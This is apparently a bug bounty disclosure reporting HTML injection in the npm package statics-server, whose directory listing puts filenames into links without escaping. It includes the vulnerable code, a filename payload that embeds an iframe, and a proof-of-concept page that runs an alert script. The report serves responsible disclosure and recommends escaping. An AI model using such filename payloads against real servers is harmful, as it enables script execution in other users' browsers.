Hi Team,
I would like to report HTML Injection in statics-server module.
It is possible to inject malicious iframe
tag via filename and execute arbitray JavaScript code.
module name: statics-serverversion:0.0.9npm page: https://www.npmjs.com/package/statics-server
npm install statics-server -g
Go to the folder you want to statics-server
Run the server statics-server
~80-100 downloads/month
statics-server
does not implement any HTML escaping when displays directory index in the browser. Variable v
is used in <a href>
element without escaping, which allows to embed HTML <iframe>
tag with src
attribute points to another HTML file in the directory. This file can contain malicious JavaScript code, which will be executed:
// ./node_modules/statics-server/index.js, line 18:
if(fs.lstatSync(staticPath).isDirectory()){
var files=fs.readdirSync(staticPath);
var lis='';
files.forEach((v,i)=>{
if(fs.lstatSync(path.resolve(staticPath,v)).isDirectory()){
lis+=`<li><a href>${v}/</a></li>`;
}else {
lis+=`<li><a href>${v}</a></li>`
}
});
(...)
Install statics-server
module:
$ npm install statics-server
"><iframe src="malware_frame.html">
malware_frame.html
file with following content:<html>
<head>
<meta charset="utf8" />
<title>Frame embeded with malware :P</title>
</head>
<body>
<p>iframe element with malicious code</p>
<script>
alert('Uh oh, I am bad, bad malware!!!')
</script>
</body>
</html>
Run statics-server
:
$ ./node_modules/statics-server/index.js
ๆๅกๅจๅทฒ็ปๅฏๅจ
่ฎฟ้ฎlocalhost:8080
http://localhost:8080
You see JavaScript from malware_frame.html
executed immediately:
{F299923}
v
variable in provided code fragment should be escaped before is send back to the browser.
Regards,
Rafal โbl4deโ Janicki
An attacker is able to execute malicious JavaScript in context of other userโs browser.